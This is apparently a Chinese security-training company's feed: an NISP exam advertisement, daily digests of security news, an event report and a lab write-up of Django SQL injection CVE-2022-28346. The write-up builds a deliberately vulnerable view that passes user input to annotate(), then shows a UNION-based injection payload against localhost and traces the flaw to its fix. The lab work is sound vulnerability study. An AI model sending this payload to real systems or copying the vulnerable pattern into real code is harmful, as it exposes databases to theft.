经国家信息安全水平考试(NISP)管理中心授权，蚁景科技正式成为国家信息安全水平考试授权运营机构，具备组织、实施和培训NISP的相关资格。 ▲NISP授权运营机构 关于NISP 1. NISP介绍 NISP全称为国家信息安全水平考试，是中国信息安全测评中心实施培养国家网络空间安全人才的项目。根据认证对象的专业基础，NISP分为一级、二级、三级（专项）三个级别，通过信息安全水平考试，全面了解和提升信息安全意识，通过三个级别的考试，快速进入网络空间安全行业。 ▲NISP证书样式 2. 考证优势 （1）国家级证书，提高应聘者在信息安全行业的竞争力。 （2）NISP认证涵盖了从基础知识到实践应用的各个方面，可以帮助你更全面地掌握信息安全知识和技能，适应企业的需求。 （3）具备更强的信息安全意识、操作技能和管理经验，从而让你有更广阔的职业发展前景。 （4）在校生还可持该证书可换取学分或申领奖学金。（具体需参考学校规定） 3. 政策补贴 为推动人才的培养与发展，满足市场需要，各地纷纷出台了相关政策，针对考取“国家信息安全水平考试（NISP）二级证书”给予补贴。 ▲某地政策补贴截图 报名NISP考试 NISP一级 【报考条件】年满16周岁的中国籍公民 【学习方式】线上学习 【考试形式】在线考试，每月一次 【考试费用】￥480 NISP二级 【报考条件】信息安全或网络安全本专业，或已参加一级考试并且考试通过 【学习方式】线上学习 【考试形式】就近城市安排线下考试 【考试费用】￥4800 扫码报名 扫描识别下方二维码，获取报名步骤

1、朝鲜APT组织入侵了首尔国立大学医院窃取数据 https://www.bleepingcomputer.com/news/security/north-korean-hackers-breached-major-hospital-in-seoul-to-steal-data/ 韩国国家警察厅(KNPA)警告说，朝鲜黑客入侵了该国最大的医院之一首尔国立大学医院(SNUH)的网络，以窃取敏感的医疗信息和个人详细信息。该事件发生在2021年5月至6月之间，警方在过去两年中进行了分析调查，以确定肇事者。韩国当地媒体将这次袭击与Kimsuky黑客组织联系起来，但警方的报告并未明确提及具体的威胁组织。攻击者使用韩国等国的七台服务器对医院内部网络发起 2、新的"Greatness"网络钓鱼即服务针对 Microsoft 365 帐户 https://www.securityweek.com/new-greatness-phishing-as-a-service-targets-microsoft-365-accounts/ 思科的 Talos 安全团队警告说，大约一年来，一种新的网络钓鱼即服务 (PaaS) 产品已被用于针对制造、医疗保健、技术和房地产行业的 Microsoft 365 帐户。该服务被称为“ Greatness ”，自 2022 年年中以来已被用于多次网络钓鱼活动，主要针对美国的组织，其他受害者则来自英国、澳大利亚、加拿大和南非。 3、谷歌通过新的 API 提高 Android 的安全性 https://www.securityweek.com/google-improves-android-security-with-new-apis/ 谷歌正在通过新的安全浏览实时 API、凭证管理器 jetpack API 和面向开发人员的新 SDK API 来提高 Android 的安全性。在本周的谷歌 I/O 开发者大会上，谷歌分享了 Android 14 安全改进的详细信息，其中包括一系列用于更安全的在线浏览、登录和恶意软件保护的 API。 4、研究人员披露允许黑客入侵 Netgear 路由器的漏洞利用链详情 https://www.securityweek.com/details-disclosed-for-exploit-chain-that-allows-hacking-of-netgear-routers/ 工业和物联网网络安全公司 Claroty 周四披露了五个漏洞的详细信息，这些漏洞可以链接到一个漏洞利用中，可能允许威胁行为者入侵某些 Netgear 路由器。 5、美政府调查罗克韦尔自动化中国业务的网络安全风险 https://www.securityweek.com/us-probing-cybersecurity-risks-of-rockwell-automations-china-operations-report/ 据《华尔街日报》报道，美国政府的多个部门参与了一项调查，重点是美国工业巨头罗克韦尔自动化在中国的业务所带来的潜在网络安全风险。 6、被判70年！Twitter 2020网络攻击策划者认罪 https://thehackernews.com/2023/05/mastermind-behind-twitter-2020-hack.html 一名英国国民已承认与 2020 年 7 月的 Twitter 攻击有关，该攻击影响了众多知名账户并欺骗了该平台的其他用户。 7、APP、小程序个人信息保护调查！拒绝授权，九成多不能正常用 https://mp.weixin.qq.com/s/1bRbh973nWaAqYYXVDzmug 5月9日，四川省保护消费者权益委员会发布《消费者个人信息保护情况调查报告》，72.24%的受访者表示个人信息曾被泄露APP、小程序过度索权严重，“安全隐私协议”太过霸道。拒绝非必要授权后，九成应用程序限制使用。 8、欧盟被告知需加强监管包括Pegasus在内的间谍软件 https://cybernews.com/security/pegasus-spyware-eu-regulation/ 欧洲议会特别委员会在长达一年的调查后表示，间谍软件被用来监视、恐吓和诋毁欧盟部分地区的反对者、记者和民间社会。 9、新的 APT 组织 Red Stinger 瞄准东欧的军事和关键基础设施 https://thehackernews.com/2023/05/new-apt-group-red-stinger-targets.html 自 2020 年以来，一个名为Red Stinger的先前未被发现的高级持续威胁 (APT) 攻击者与针对东欧的攻击有关。 10、安天发布yayaya Miner挖矿木马分析报告 https://mp.weixin.qq.com/s/UYdze4yt2OoWoTcK0qY3Mw 安天CERT捕获了一批活跃的挖矿木马样本，该挖矿木马主要利用SSH弱口令暴力破解对Linux平台进行攻击。由于其初始攻击脚本中多次出现“yayaya”字符串，且在Linux内核模块中会隐藏包含该字符串的所有信息，因此安天CERT将该挖矿木马命名为“yayaya Miner”。yayaya Miner挖矿木马使用shc工具加密初始攻击脚本，利用该工具可以把Shell脚本转换成二进制可执行文件（ELF），使用RC4加密算法对其进行加密，初始攻击脚本文件会删除系统日志、创建yayaya等目录、删除特 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、新的DDoS僵尸网络AndoryuBot利用Ruckus漏洞发起攻击 https://www.bleepingcomputer.com/news/security/critical-ruckus-rce-flaw-exploited-by-new-ddos-botnet-malware/ 一种名为“AndoryuBot”的新型恶意软件僵尸网络针对Ruckus无线管理面板中的严重漏洞，感染未打补丁的Wi-Fi接入点以用于DDoS攻击。该漏洞编号为CVE-2023-25717，影响所有Ruckus无线管理面板10.4及更早版本，允许远程攻击者通过向易受攻击的设备发送未经身份验证的HTTP GET请求来执行代码。该漏洞于2023年2月8日被发现并修复，尽管如此，许多 2、FBI使用自毁命令摧毁俄罗斯Snake数据盗窃恶意软件 https://www.bleepingcomputer.com/news/security/fbi-nukes-russian-snake-data-theft-malware-with-self-destruct-command/ 来自所有五眼联盟成员国的网络安全和情报机构关闭了俄罗斯联邦安全局(FSB)运营的Snake网络间谍恶意软件使用的基础设施。Snake恶意软件的开发始于2003年底，名为“Uroburos”，而第一个版本的植入程序似乎在2004年初完成，俄罗斯国家黑客随后立即在攻击中部署了该恶意软件。“司法部与我们的国际合作伙伴一起，摧毁了一个受恶意软件感染的全球计算机网络，俄 3、GitHub新功能自动阻止令牌和API密钥泄漏 https://www.bleepingcomputer.com/news/security/github-now-auto-blocks-token-and-api-key-leaks-for-all-repos/ GitHub现在自动阻止所有公共代码存储库的API密钥和访问令牌等敏感信息的泄露。此功能通过在接受“git push”操作之前扫描秘密来主动防止泄漏，并且它适用于可检测的69种令牌类型（API 密钥、私钥、秘密密钥、身份验证令牌、访问令牌、管理证书、凭据等）具有较低的“误报”检测率。GitHub表示：“如果你正在推送包含敏感信息的提交，推送保护提示将出现，其中包含有关敏感信息类 4、研究人员分享了 NTLM 凭据盗窃的新零点击Windows漏洞详情 https://thehackernews.com/2023/05/experts-detail-new-zero-click-windows.html 网络安全研究人员分享了有关 Windows MSHTML 平台中现已修补的安全漏洞的详细信息，该漏洞可能被滥用以绕过目标机器上的完整性保护。该漏洞被跟踪为CVE-2023-29324（CVSS 评分：6.5），被描述为绕过安全功能。微软在 2023 年 5 月的补丁星期二更新中解决了这个问题。发现并报告该漏洞的 Akamai 安全研究员 Ben Barnea 指出，所有 Windows 版本都受到影响。 5、复杂的DownEx 恶意软件活动针对中亚各国政府 https://thehackernews.com/2023/05/sophisticated-downex-malware-campaign.html 一种名为 DownEx 的新型复杂恶意软件参与了针对中亚政府组织的攻击。2022 年底， Bitdefender Labs 研究人员首次观察到针对哈萨克斯坦外国政府机构的高度针对性网络攻击，其中涉及一种名为 DownEx 的新型复杂恶意软件。 6、美国公司大规模部署员工监视工具 https://www.freebuf.com/news/365937.html 从按键和屏幕截图到录音和GPS定位追踪，据估计，到2025年，每10家美国公司中至少有7家会对员工进行数字监控，以观察衡量员工的生产力。 7、拒绝支付赎金后，LockBit 泄露印度信贷公司600GB的数据 https://www.freebuf.com/news/366094.html LockBit 3.0勒索软件集团周一泄露了从印度贷款机构Fullerton India窃取的600GB关键数据，两周后该集团向该公司要求300万美元赎金。 8、Google允许美国用户搜索他们的 Gmail ID是否出现在暗网上 https://www.securityweek.com/google-now-lets-us-users-search-dark-web-for-their-gmail-id/ 谷歌今天在其年度开发者大会 Google I/O 上宣布，美国的 Gmail 用户现在可以运行扫描以查明他们的 Gmail ID 是否出现在暗网上。 9、在 Apple 版权案中，上诉法院支持 Corellium https://www.securityweek.com/appeals-court-sides-with-corellium-in-apple-copyright-case/ 在 Apple 就其安全研究工具对 Corellium 提起的版权侵权诉讼中，美国上诉法院支持 Corellium。 10、全球最大规模AI黑客大赛将开启：白宫支持 针对大模型安全 https://www.secrss.com/articles/54509 安全内参5月10日消息，美国白宫在上周四宣布，OpenAI、谷歌、Antrhopic、Hugging Face、微软、英伟达与Stability AI等顶尖人工智能提供商，将在DEF CON 31上共同参与对他们的生成式人工智能系统的公开安全评估。DEF CON是每年8月在拉斯维加斯召开的黑客大会，此次安全竞赛由人工智能黑客社区AI Village主办。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

漏洞简介 Django 在2022年发布的安全更新，修复了在 QuerySet 的 annotate()， aggregate()， extra() 等函数中存在的 SQL 注入漏洞。 影响版本 2.2<= Django Django <2.2.28 3.2<= Django Django <3.2.13 4.0<= Django Django <4.0.4 需要使用了 annotate 或者 aggregate 或 extra 方法 环境搭建 搭建特定版本的 django 项目 利用 pycharm 创建一个 python 项目 创建完成项目后在 Settings 中找到 Project: CVE202228346 对应的 Python Interpreter 添加存在问题的 Django 版本 在 Terminal 中执行命令，创建 django 项目 django-admin startproject CVE202228346 配置启动设置 运行后就启动了最简单的 django 项目 ‍ 编写配置漏洞代码 折腾来折腾去，出现了很多问题，一度想要放弃说直接采用 docker ，但是在不断的试错下，最终还是编写成功 因为对 python 的 django 不太熟悉，所以其中可能更多的是比较偏向于基础的操作 ‍ 进入到项目目录下创建命令 创建第一个应用 在 settings.py 中添加配置 在 urls.py 中添加 对应的 url，urls.py 相当于路由解析器，将路由解析到对应的 views.py 中对应的函数上 urlpatterns = [    path('admin/', admin.site.urls),    path('index/',views.index),    path('demo/',views.users),    path('initialize/',views.loadexampledata) ] ‍ models.py 是创建表结构的时候使用，通过类的定义，可以创建一个表 from django.db import models # Create your models here. class User(models.Model):    name = models.CharField(max_length=200)    def __str__(self):        return self.name ‍ views.py 主要定义了对应路由所响应的函数 from django.db.models import Count from django.http import HttpResponse from django.shortcuts import render from .models import User # Create your views here. def index(request):    return HttpResponse('hello world') def users(request):    field = request.GET.get('field', 'name')    user_amount = User.objects.annotate(**{field: Count("name")})    html = ""    for u in user_amount:        html += "<h3>Amoount of users: {0}</h3>".format(u)    return HttpResponse(html) def loadexampledata(request):    u = User(name="Admin")    u.save()    u = User(name="Staff1")    u.save()    u = User(name="Staff12")    u.save()    return HttpResponse("ok") 三个函数分别是 helloword 函数，往数据库中加参数，以及查询数据库中的字段 ‍ 编写好代码后，需要对数据库执行初始化操作 python manage.py makemigrations python manage.py migrate ‍ 漏洞复现 先访问 initialize 为数据库中添加信息 构造 payload http://127.0.0.1:8000/demo/?field=demo.name" FROM "demo_user" union SELECT "1",sqlite_version(),"3" -- 漏洞分析 发现一个问题，在加上断点调试以后，每次运行输出的结果跟不加断点运行的结果存在很大的差异，结果完全不同。不断尝试之后发现是因为在某些地方加上断点之后，在调试器中查看变量和状态可能会影响程序的执行速度和内存使用情况，为了方便的输出某些位置的变量，采用 print 的方法结合断点调试。 通过 get 传入的参数 field CVE202228346.demo.views.users 此处的**{field: Count("name")} 用来表示拆分字典 跟进 annotate 对传入参数的处理 django.db.models.query.QuerySet.annotate 继续将参数传入到 _annotate 进行处理 django.db.models.query.QuerySet._annotate 在将 kwargs 的值 update 到 annotations 后，调用 add_annotation 进行处理 django.db.models.sql.query.Query.add_annotation add_annotation 也是漏洞存在的关键位置，因为修复漏洞的关键位置也在此处 调用 resolve_expression 解析表达式 django.db.models.aggregates.Aggregate.resolve_expression django.db.models.expressions.Func.resolve_expression django.db.models.expressions.F.resolve_expression django.db.models.sql.query.Query.resolve_ref 最后我们可以看到 clone 对应的值 以及执行的 SQL 语句 整个漏洞分析下来，仍然有很多不太清楚的地方，可能再分析几个关于 Django 的漏洞会好一些 ‍ 漏洞修复 在 add_annotation 添加了 check_alias 来对传入的参数进行校验

5月7日，湖南蚁景科技有限公司受邀出席中国刑事警察学院公安信息技术与情报学院学科专业建设研讨会。 本次研讨会由中国刑事警察学院主办，公安信息技术与情报学院、教育部网络安全与执法专业虚拟教研室、辽宁网络安全执法协同创新中心、网络安全执法与视频侦查辽宁省重点实验室协办。网络安全与执法专业、公安视听技术专业、公安情报学专业和技术侦查学专业的等相关人员参会，共同探讨学院学科专业建设的新思路。 研讨会开幕式上，中国刑事警察学院公安信息技术与情报学院秦玉海院长、沈阳市公安局班昊副局长、公安部技侦局陈伟致辞。 ▲开幕式 数名特邀嘉宾依次在大会上做了精彩报告，很荣幸，蚁景科技就是其中一员。蚁景科技副总经理皮开元在网络安全与执法专业虚拟教研室建设研讨会上以《网络安全在线实践平台支撑“网络安全与执法专业”一流学科、专业与课程建设情况汇报》为题发表演讲报告，分享了蚁景科技网安教育解决方案。 ▲蚁景科技演讲主题 ▲副总经理皮开元 报告内容基于蚁景科技旗下领先的网络安全人才实践平台-蚁景网安实验室展开，重点阐述了我司在课程内容建设与在线实验教学平台两大方向上的网安教育服务工作。 蚁景网安实验室是一款致力于推进网络安全教育和人才培养的重要支撑平台，全方位覆盖了网络安全领域包括web安全、渗透测试、CTF网络攻防等1500+内容。不仅适合于初学者，也适合于专业人员深入学习和研究，无论是网安爱好者与学生，教师和学校组织（教师联合实验室）都可以将平台充分利用起来。 在教师联合实验室方面，平台提供了丰富的课件库、快捷方便的教学环境、科学的知识图谱与清晰的学习路径，为国内1000+高校提供了信息安全教学支撑，在提升网安教学效率、减轻教学压力、优化教学安排方面起到了积极作用。例如，高校可以根据自己的需要选择合适的课件，为学生提供全方位、系统化的网安教育和培训。目前，蚁景网安实验室已经顺利支撑中国刑事警察学院网络安全与执法专业数名教师，共计开设10余门课程，累计支撑600余名学生进行学习实践，涉及到专业建设的“实验”、“实训”与“第二课堂”等实践环节。 除了教师联合实验室，蚁景网安实验室还在个人用户体验方面提供了丰富的网络安全实践机会和靶场体验，通过模拟真实的网络环境和安全威胁场景，为数十万人提供了实践机会，一定程度上提升了其实战技能水平。 ▲合影 蚁景科技在此次研讨会上，与参会代表进行了深入的交流，得到了各位专家教授的宝贵指导与建议。我们有信心和决心，未来将继续专注网络安全领域、关注警察行业网络安全与执法专业建设要求，继续加强对蚁景网安实验室的改进完善，为网络安全行业培养更多优秀的人才做出更大的贡献。

1、SideCopy使用Action RAT和AllaKore RAT渗透印度组织 https://thehackernews.com/2023/05/sidecopy-using-action-rat-and-allakore.html 据观察，被称为SideCopy的疑似与巴基斯坦结盟的威胁行为者利用与印度军事研究组织相关的主题作为正在进行的网络钓鱼活动的一部分。Fortinet FortiGuard Labs在一份新报告中表示，这涉及使用与印度国防研究与发展组织(DRDO)有关的ZIP存档诱饵来传递能够收集敏感信息的恶意载荷。这个网络间谍组织的活动至少可以追溯到2019年，目标是符合巴基斯坦政府利益的实体。据信，它与另一个名为Transparent Tribe的巴基斯 2、LockBit 3.0勒索团伙泄露了从印度银行窃取的600GB数据 https://www.govinfosecurity.com/lockbit-30-leaks-600-gbs-data-stolen-from-indian-lender-a-22010 LockBit 3.0勒索软件组织周一泄露了从印度银行Fullerton India窃取的600GB关键数据，两周前该组织向该公司索要300万美元的赎金。Fullerton India于4月24日表示，它遭受了恶意软件攻击，作为预防措施，它被迫暂时离线运营。该勒索软件组织很快在其数据泄露网站上将Fullerton India列为受害者，称其窃取了超过600GB的“与个人和合法公司签订的贷款协议”。该组织 3、攻击者利用伪造的二维码窃取数据或劫持付款 https://www.bleepingcomputer.com/news/security/qr-codes-used-in-fake-parking-tickets-surveys-to-steal-your-money/ 随着二维码持续被合法组织大量使用——从广告到强制执行停车费和罚款，诈骗者已经悄悄进入，滥用这项技术来达到他们邪恶的目的。据报道，新加坡的一名妇女在一家奶茶店使用二维码填写“调查问卷”后损失了20000美元，而在美国和英国则观察到针对司机的带有二维码的假停车传单案例。值得注意的是，受害者下载的特定恶意软件应用程序要求用户授予对手机麦克风和摄像头的访问权限，此外还有And 4、FBI查封了13个与DDoS租用服务相关的域 https://www.bleepingcomputer.com/news/security/fbi-seizes-13-more-domains-linked-to-ddos-for-hire-services/ 美国司法部今天宣布没收了13个与DDoS出租平台相关的域。“作为针对计算机攻击‘引导程序’服务的持续举措的一部分，司法部今天宣布法院授权没收与这些DDoS出租服务相关的13个互联网域，”司法部表示。这些服务允许付费用户发起强大的分布式拒绝服务或DDoS攻击，向目标计算机发送大量信息并阻止他们访问互联网。FBI通过在每个服务中开设或续订帐户来测试域被查封的引导程序服务，并通过对该机 5、微软周二补丁日发布更新修补40 个漏洞，包括2 个零日漏洞 https://www.securityweek.com/microsoft-patch-tuesday-40-vulnerabilities-2-zero-days/ 微软 2023 年 5 月的安全更新解决了总共 40 个新记录的漏洞，包括两个已经在攻击中被利用的漏洞。 6、全球食品分销巨头 Sysco 披露数据泄露 https://securityaffairs.com/145996/data-breach/sysco-discloses-data-breach.html 全球食品分销巨头西斯科披露了一起数据泄露事件，被泄露的数据包括客户和员工数据。 7、Linux NetFilter 内核漏洞( CVE-2023-32233)允许将权限提升至"root" https://securityaffairs.com/145989/security/linux-netfilter-kernel-flaw.html Linux NetFilter 内核缺陷（编号为 CVE-2023-32233）可被非特权本地用户利用，将其权限提升至 root。该漏洞影响多个 Linux 内核版本，包括 Linux 6.3.1（当前稳定版） 8、Fortinet 警告与 AndoryuBot DDoS 僵尸网络相关的活动激增 https://securityaffairs.com/145980/cyber-crime/andoryubot-ddos-botnet.html FortiGuard Labs 研究人员最近观察到试图利用 Ruckus Wireless Admin 远程代码执行漏洞（CVE-2023-25717）的攻击激增。该活动与一个名为 AndoryuBot 的已知 DDoS 僵尸网络相关，该僵尸网络于 2023 年 2 月首次出现。该僵尸网络支持多种 DDoS 攻击技术，并使用 SOCKS5 代理进行 C2 通信。 9、微软表示伊朗黑客组织针对Papercut发起攻击 https://www.bleepingcomputer.com/news/security/microsoft-iranian-hacking-groups-join-papercut-attack-spree/ 微软表示，伊朗国家支持的黑客加入了针对易受攻击的PaperCut MF/NG打印管理服务器的持续攻击。这些组织被追踪为Mango Sandstorm（又名Mercury或Muddywater，与伊朗情报和安全部有关）和Mint Sandstorm（也称为Phosphorus或APT35，与伊朗伊斯兰革命卫队有关）。”CISA于4月21日将此错误添加到其被积极利用的漏洞目录中，命令 10、新的 CACTUS 勒索软件出现在威胁领域 https://securityaffairs.com/145960/malware/new-cactus-ransomware.html 研究人员警告称，一个名为 CACTUS 的新勒索软件家族会利用 VPN 设备中的已知漏洞来获得对受害者网络的初始访问权限。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、新的Cactus勒索软件通过自我加密来规避检测 https://www.bleepingcomputer.com/news/security/new-cactus-ransomware-encrypts-itself-to-evade-antivirus/ 一种名为Cactus的新型勒索软件一直在利用VPN设备中的漏洞对“大型商业实体”的网络进行初始访问。Cactus勒索软件行动至少从3月开始就一直活跃，并正在索求受害者的大笔赎金。虽然新的威胁行为者采用了勒索软件攻击中常见的策略——文件加密和数据盗窃，但它增加了自己的手段来避免被发现。Cactus与其他勒索软件的不同之处在于使用加密来保护勒索软件二进制文件。攻击者使用批处理脚本通过7-Z 2、西部数据称黑客在三月份的网络攻击中窃取了客户数据 https://www.bleepingcomputer.com/news/security/western-digital-says-hackers-stole-customer-data-in-march-cyberattack/ 在确认黑客在三月份的网络攻击中窃取了敏感的个人信息后，西部数据已将其商店下线并向客户发送数据泄露通知。该公司通过电子邮件发送了数据泄露通知，警告说客户的数据存储在攻击期间被盗的西部数据数据库中。西部数据表示：“根据调查，我们最近了解到，在2023年3月26日前后，未经授权的一方获得了西部数据数据库的副本，其中包含我们在线商店客户的有限个人信息。”这些信息包括客 3、谷歌发布用于检测容器镜像安全的开源 Bazel 插件 https://www.securityweek.com/google-releases-open-source-bazel-plugin-for-container-image-security/ Google 宣布全面推出“rules_oci”Bazel 插件，以提高容器镜像的安全性。 4、Money Message 团伙公布了 MSI 私有代码签名密钥 https://securityaffairs.com/145940/data-breach/msi-data-breach-key-leaked.html 攻击台湾地区 PC 制造商 MSI 的勒索软件团伙在其暗网泄漏网站上泄露了该公司的私有代码签名密钥。 5、NextGen Healthcare 遭遇数据泄露，影响超过 100 万人 https://securityaffairs.com/145935/data-breach/nextgen-healthcare-data-breach.html NextGen Healthcare 遭遇数据泄露，安全事件暴露了大约 100 万个人的个人信息。 6、信安标委发布2023年度第一批网络安全国家标准需求 https://www.freebuf.com/news/365915.html 据信安标委网站6日消息，为加强网络安全国家标准在国家网络安全保障工作中的基础性、规范性、引领性作用，全国信息安全标准化技术委员会（简称“信安标委”）秘书处坚持问题导向，调研国家网络安全重点工作和技术产业发展需求，研究形成了2023年度第一批网络安全国家标准需求清单。信安标委要求做好申报工作，并于2023年5月12日前通过信安标委网站首页（www.tc260.org.cn）“关于发布2023年度第一批网络安全国家标准需求的通知”模块进行申报。 7、新的Android恶意软件“FluHorse”以欺骗性策略瞄准东亚市场 https://thehackernews.com/2023/05/new-android-malware-fluhorse-targeting.html 东亚市场的各个行业都受到了新的电子邮件网络钓鱼活动的影响，该活动分发了一种以前未记录的Android恶意软件FluHorse，该恶意软件滥用了Flutter软件开发框架。 8、美国防部零信任架构试点成功，将在2个月内全面投产 https://www.secrss.com/articles/54385 美国国防部零信任战略要求的153项关键活动中，DISA雷霆穹顶项目现可提供约123项能力。 9、黑客使用新的网络注入工具包DrIBAN瞄准意大利企业银行客户 https://thehackernews.com/2023/05/hackers-targeting-italian-corporate.html 意大利企业银行客户是正在进行的金融欺诈活动的目标，该活动至少自 2019 年以来一直在利用名为 drIBAN 的新网络注入工具包。 10、新的勒索软件Akira针对多家企业发起网络攻击 https://www.bleepingcomputer.com/news/security/meet-akira-a-new-ransomware-operation-targeting-the-enterprise/ 新的Akira勒索软件团伙慢慢地建立了一份受害者名单，因为他们破坏了全球的公司网络，加密文件，然后要求数百万美元的赎金。Akira于2023年3月推出，声称已经对16家公司进行了攻击。这些公司分布在各个行业，包括教育、金融、房地产、制造和商业咨询。与其他勒索软件操作一样，Akira会破坏公司网络并横向传播到其他设备。一旦威胁行为者获得Windows域管理员凭据，他们就会在整 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。